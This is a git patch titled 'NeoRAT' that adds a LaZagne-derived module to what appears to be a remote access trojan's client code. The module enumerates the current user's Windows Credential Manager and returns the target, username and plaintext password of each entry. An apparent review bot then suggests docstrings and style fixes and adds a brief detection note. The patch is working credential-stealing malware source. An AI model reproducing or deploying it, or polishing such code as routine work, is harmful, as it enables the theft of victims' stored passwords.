From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/windows/credman.py | 34 ++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/windows/credman.py

(limited to 'foreign/client_handling/lazagne/softwares/windows/credman.py')

diff --git a/foreign/client_handling/lazagne/softwares/windows/credman.py b/foreign/client_handling/lazagne/softwares/windows/credman.py
new file mode 100644
index 0000000..309a125
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/windows/credman.py
@@ -0,0 +1,34 @@
+# -*- coding: utf-8 -*-
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import *
+
+
+class Credman(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'credman', 'windows', only_from_current_user=True)
+
+ def run(self):
+ pwd_found = []
+ # FOR XP
+ # - password are encrypted with specific salt depending on its Type
+ # entropy = 'abe2869f-9b47-4cd9-a358-c22904dba7f7\\0' # FOR CRED_TYPE_GENERIC
+ # entropy = '82BD0E67-9FEA-4748-8672-D5EFE5B779B0\\0' # FOR CRED_TYPE_DOMAIN_VISIBLE_PASSWORD
+ # CryptUnprotectData(byref(blobIn),None,byref(blobEntropy),None,None,CRYPTPROTECT_UI_FORBIDDEN,byref(blobOut))
+
+ creds = POINTER(PCREDENTIAL)()
+ count = c_ulong()
+
+ if CredEnumerate(None, 0, byref(count), byref(creds)) == 1:
+ for i in range(count.value):
+ c = creds[i].contents
+ if c.Type == CRED_TYPE_GENERIC or c.Type == CRED_TYPE_DOMAIN_VISIBLE_PASSWORD:
+ # Remove password too long
+ if c.CredentialBlobSize.real < 200:
+ pwd_found.append({
+ 'URL': c.TargetName,
+ 'Login': c.UserName,
+ 'Password': c.CredentialBlob[:c.CredentialBlobSize.real] # \\x00 could be deleted
+ })
+
+ CredFree(creds)
+ return pwd_found
--
cgit v1.2.3
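Review bot: Credman.run and the new file carry no docstring explaining what the module returns or why `only_from_current_user=True` is set, and the bare `< 200` cutoff plus the commented-out XP entropy block are left unexplained. Suggest a run() docstring along the lines of `"""Return CRED_TYPE_GENERIC and CRED_TYPE_DOMAIN_VISIBLE_PASSWORD entries from the calling user's Credential Manager via CredEnumerate/CredFree; blobs of 200 bytes or more are skipped."""` and naming the cutoff (`MAX_BLOB_SIZE = 200`) rather than leaving a magic number beside a dead comment. On style, `c.CredentialBlobSize.real` is a no-op on an integer, and comparing a Win32 BOOL with `== 1` should be a plain truth test. From a detection standpoint this file is a direct read of the Windows Credential Manager (MITRE ATT&CK T1555.004), so the host indicator a defender can act on is an unexpected process enumerating the vault in a user session rather than anything specific to these strings.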